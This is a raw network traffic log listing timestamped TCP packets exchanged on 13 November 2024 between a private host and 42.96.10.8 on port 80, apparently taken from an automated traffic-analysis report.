                                                                                                                                                                                                            Nov 13, 2024 13:25:21.945732117 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.945775986 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.976723909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.976777077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.976793051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.976808071 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.976819992 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.976840973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.976856947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.976871967 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.976882935 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.976897001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.976913929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.976918936 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.976928949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.976944923 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.976953030 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.976960897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.976977110 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.976984978 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.976994991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.977001905 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.977013111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.977029085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.977036953 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.977044106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.977066994 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.982114077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.982232094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.982245922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.982260942 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.982409000 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.982446909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.982546091 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.982559919 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.982562065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.982697964 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.983414888 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.983442068 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.983458042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.983516932 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.983572006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.983588934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.983603954 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.983628035 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:21.984186888 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.003228903 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.003258944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.003273964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.003377914 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.006639957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.006690025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.006705999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.006751060 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.006787062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.006802082 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.006818056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.006833076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.006856918 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.006869078 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007086992 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007101059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007116079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007131100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007138968 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007148027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007164955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007174015 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007180929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007199049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007205963 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007213116 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007230997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007239103 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007266045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007282019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007287979 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007323027 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007366896 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007381916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007397890 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007412910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007421970 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007428885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007452965 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007489920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007507086 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007522106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007539034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007548094 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007555008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007571936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007581949 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007658005 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007746935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007762909 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007778883 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007802963 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007834911 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007864952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007880926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007896900 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007913113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007961035 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007961035 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.007998943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.008014917 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.008032084 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.008057117 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.008124113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.008140087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.008156061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.008162975 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.008172989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.008196115 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.008235931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.008250952 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.008265972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.008280039 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.008291960 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.008295059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.008316040 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.008344889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.008354902 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.008363008 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.008378029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.008399963 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.008586884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.008620024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.008635044 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.008712053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.008728027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.008734941 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.008769035 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.008860111 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.008873940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.008925915 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.008933067 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.008943081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.008959055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.008976936 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.008985043 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009007931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009022951 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009032965 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009072065 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009186983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009203911 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009228945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009239912 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009243965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009260893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009275913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009290934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009298086 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009306908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009330034 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009334087 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009349108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009358883 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009365082 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009381056 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009388924 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009398937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009423018 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009453058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009469032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009525061 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009640932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009665966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009681940 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009685993 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009697914 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009716034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009723902 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009735107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009810925 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009821892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009838104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009861946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009870052 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009877920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009893894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009901047 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009907961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009924889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009932995 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009953976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009968996 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009978056 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.009988070 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.010119915 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.010124922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.010138035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.010153055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.010169029 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.010174990 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.010184050 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.010200024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.010207891 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.010234118 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.010243893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.010301113 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.010660887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.010678053 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.010785103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.010801077 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.010809898 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.010827065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.010842085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.010849953 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.010859013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.010886908 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.010971069 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.010986090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011010885 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011018991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011032104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011048079 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011063099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011070013 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011079073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011096001 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011102915 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011113882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011137962 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011176109 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011192083 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011202097 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011205912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011219978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011229992 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011234999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011251926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011257887 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011269093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011291981 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011331081 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011346102 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011360884 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011370897 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011374950 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011390924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011405945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011413097 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011420965 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011436939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011445045 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011452913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011460066 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011480093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011497021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011504889 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011516094 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011531115 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011544943 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011547089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011564016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011571884 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011579990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011595011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011605978 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011610985 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011629105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011636019 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011646032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011658907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011670113 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011684895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011701107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011708975 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011715889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011732101 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011739969 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011749983 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011775017 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011802912 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011816978 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011831045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011847019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011852980 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011862993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011879921 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011888027 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011895895 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011900902 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011924028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:22.011940002 CET804973342.96.10.8192.168.2.4
